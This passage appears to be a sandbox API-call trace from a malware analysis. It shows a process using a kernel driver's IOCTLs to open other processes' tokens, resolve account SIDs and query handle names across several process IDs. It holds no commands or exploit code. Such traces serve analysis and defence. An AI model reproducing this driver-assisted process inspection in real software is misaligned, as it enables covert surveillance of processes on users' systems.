[0246.143] ObfDereferenceObject (Object=0xfffffa80020c1760) returned 0x14 [0246.143] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002162b80 | out: TokenHandle=0xfffffa8002162b80*=0xc4) returned 0x0 [0246.143] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.143] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.143] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.143] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.145] CloseHandle (hObject=0xc4) returned 1 [0246.145] CloseHandle (hObject=0xc8) returned 1 [0246.145] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.145] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0246.145] PsLookupProcessByProcessId (in: ProcessId=0x864, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.145] PsAcquireProcessExitSynchronization () returned 0x0 [0246.145] KeStackAttachProcess (in: PROCESS=0xfffffa80020c1760, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020c1760, ApcState=0xfffff880053c85d0) [0246.145] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020c6d20, HandleInformation=0x0) returned 0x0 [0246.145] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.145] PsReleaseProcessExitSynchronization () returned 0x2 [0246.145] ObfDereferenceObject (Object=0xfffffa80020c1760) returned 0x12 [0246.145] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003088044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003088044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.145] ObfDereferenceObject (Object=0xfffffa80020c6d20) returned 0x1 [0246.145] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.146] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.146] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.146] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x76, lpOverlapped=0x0) returned 1 [0246.146] PsLookupProcessByProcessId (in: ProcessId=0x864, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.146] PsAcquireProcessExitSynchronization () returned 0x0 [0246.146] KeStackAttachProcess (in: PROCESS=0xfffffa80020c1760, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020c1760, ApcState=0xfffff880053c85d0) [0246.146] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020c14e0, HandleInformation=0x0) returned 0x0 [0246.146] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.146] PsReleaseProcessExitSynchronization () returned 0x2 [0246.146] ObfDereferenceObject (Object=0xfffffa80020c1760) returned 0x12 [0246.146] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.146] ObfDereferenceObject (Object=0xfffffa80020c14e0) returned 0x1 [0246.146] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.146] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.146] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.146] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.146] PsLookupProcessByProcessId (in: ProcessId=0x864, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.146] PsAcquireProcessExitSynchronization () returned 0x0 [0246.146] KeStackAttachProcess (in: PROCESS=0xfffffa80020c1760, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020c1760, ApcState=0xfffff880053c85d0) [0246.146] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0246.146] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.146] PsReleaseProcessExitSynchronization () returned 0x2 [0246.146] ObfDereferenceObject (Object=0xfffffa80020c1760) returned 0x12 [0246.146] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003087044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003087044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.146] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0246.146] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.147] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x874) returned 0xc8 [0246.147] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.147] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa80020cf7c0, HandleInformation=0x0) returned 0x0 [0246.147] ObOpenObjectByPointer (in: Object=0xfffffa80020cf7c0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.147] ObfDereferenceObject (Object=0xfffffa80020cf7c0) returned 0x14 [0246.147] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002162b80 | out: TokenHandle=0xfffffa8002162b80*=0xc4) returned 0x0 [0246.147] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.147] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.147] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.147] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.149] CloseHandle (hObject=0xc4) returned 1 [0246.149] CloseHandle (hObject=0xc8) returned 1 [0246.149] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.149] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0246.149] PsLookupProcessByProcessId (in: ProcessId=0x874, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.149] PsAcquireProcessExitSynchronization () returned 0x0 [0246.149] KeStackAttachProcess (in: PROCESS=0xfffffa80020cf7c0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020cf7c0, ApcState=0xfffff880053c85d0) [0246.149] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020d4a20, HandleInformation=0x0) returned 0x0 [0246.149] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.149] PsReleaseProcessExitSynchronization () returned 0x2 [0246.150] ObfDereferenceObject (Object=0xfffffa80020cf7c0) returned 0x12 [0246.150] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.150] ObfDereferenceObject (Object=0xfffffa80020d4a20) returned 0x1 [0246.150] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.150] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.150] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.150] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x94, lpOverlapped=0x0) returned 1 [0246.150] PsLookupProcessByProcessId (in: ProcessId=0x874, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.150] PsAcquireProcessExitSynchronization () returned 0x0 [0246.150] KeStackAttachProcess (in: PROCESS=0xfffffa80020cf7c0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020cf7c0, ApcState=0xfffff880053c85d0) [0246.150] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020d9070, HandleInformation=0x0) returned 0x0 [0246.150] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.150] PsReleaseProcessExitSynchronization () returned 0x2 [0246.150] ObfDereferenceObject (Object=0xfffffa80020cf7c0) returned 0x12 [0246.150] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.150] ObfDereferenceObject (Object=0xfffffa80020d9070) returned 0x1 [0246.150] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.150] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.150] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.150] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.150] PsLookupProcessByProcessId (in: ProcessId=0x874, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.151] PsAcquireProcessExitSynchronization () returned 0x0 [0246.151] KeStackAttachProcess (in: PROCESS=0xfffffa80020cf7c0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020cf7c0, ApcState=0xfffff880053c85d0) [0246.151] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0246.151] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.151] PsReleaseProcessExitSynchronization () returned 0x2 [0246.151] ObfDereferenceObject (Object=0xfffffa80020cf7c0) returned 0x12 [0246.151] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.151] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0246.151] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.151] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x884) returned 0xc8 [0246.151] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.151] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa80020d1b30, HandleInformation=0x0) returned 0x0 [0246.151] ObOpenObjectByPointer (in: Object=0xfffffa80020d1b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.151] ObfDereferenceObject (Object=0xfffffa80020d1b30) returned 0x14 [0246.151] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002162b80 | out: TokenHandle=0xfffffa8002162b80*=0xc4) returned 0x0 [0246.151] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.151] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.151] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.152] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.154] CloseHandle (hObject=0xc4) returned 1 [0246.154] CloseHandle (hObject=0xc8) returned 1 [0246.154] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.154] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0246.154] PsLookupProcessByProcessId (in: ProcessId=0x884, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.154] PsAcquireProcessExitSynchronization () returned 0x0 [0246.154] KeStackAttachProcess (in: PROCESS=0xfffffa80020d1b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020d1b30, ApcState=0xfffff880053c85d0) [0246.154] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020d4070, HandleInformation=0x0) returned 0x0 [0246.154] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.154] PsReleaseProcessExitSynchronization () returned 0x2 [0246.154] ObfDereferenceObject (Object=0xfffffa80020d1b30) returned 0x12 [0246.154] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.154] ObfDereferenceObject (Object=0xfffffa80020d4070) returned 0x1 [0246.154] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.155] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.155] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.155] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x80, lpOverlapped=0x0) returned 1 [0246.155] PsLookupProcessByProcessId (in: ProcessId=0x884, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.155] PsAcquireProcessExitSynchronization () returned 0x0 [0246.155] KeStackAttachProcess (in: PROCESS=0xfffffa80020d1b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020d1b30, ApcState=0xfffff880053c85d0) [0246.155] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020dd720, HandleInformation=0x0) returned 0x0 [0246.155] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.155] PsReleaseProcessExitSynchronization () returned 0x2 [0246.155] ObfDereferenceObject (Object=0xfffffa80020d1b30) returned 0x12 [0246.155] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.155] ObfDereferenceObject (Object=0xfffffa80020dd720) returned 0x1 [0246.155] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.155] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.155] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.155] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.155] PsLookupProcessByProcessId (in: ProcessId=0x884, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.155] PsAcquireProcessExitSynchronization () returned 0x0 [0246.155] KeStackAttachProcess (in: PROCESS=0xfffffa80020d1b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020d1b30, ApcState=0xfffff880053c85d0) [0246.155] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0246.155] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.155] PsReleaseProcessExitSynchronization () returned 0x2 [0246.155] ObfDereferenceObject (Object=0xfffffa80020d1b30) returned 0x12 [0246.155] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.156] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0246.156] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.156] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0xc8 [0246.156] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.156] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa80020e7060, HandleInformation=0x0) returned 0x0 [0246.156] ObOpenObjectByPointer (in: Object=0xfffffa80020e7060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.156] ObfDereferenceObject (Object=0xfffffa80020e7060) returned 0x14 [0246.156] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002162b80 | out: TokenHandle=0xfffffa8002162b80*=0xc4) returned 0x0 [0246.156] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.156] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.156] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.156] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.158] CloseHandle (hObject=0xc4) returned 1 [0246.158] CloseHandle (hObject=0xc8) returned 1 [0246.158] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.158] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0246.158] PsLookupProcessByProcessId (in: ProcessId=0x894, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.158] PsAcquireProcessExitSynchronization () returned 0x0 [0246.158] KeStackAttachProcess (in: PROCESS=0xfffffa80020e7060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020e7060, ApcState=0xfffff880053c85d0) [0246.158] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020e4cd0, HandleInformation=0x0) returned 0x0 [0246.159] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.159] PsReleaseProcessExitSynchronization () returned 0x2 [0246.159] ObfDereferenceObject (Object=0xfffffa80020e7060) returned 0x12 [0246.159] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.159] ObfDereferenceObject (Object=0xfffffa80020e4cd0) returned 0x1 [0246.159] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.159] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.159] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.159] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x68, lpOverlapped=0x0) returned 1 [0246.159] PsLookupProcessByProcessId (in: ProcessId=0x894, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.159] PsAcquireProcessExitSynchronization () returned 0x0 [0246.159] KeStackAttachProcess (in: PROCESS=0xfffffa80020e7060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020e7060, ApcState=0xfffff880053c85d0) [0246.159] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020ddca0, HandleInformation=0x0) returned 0x0 [0246.159] KeUnstackDetachProcess 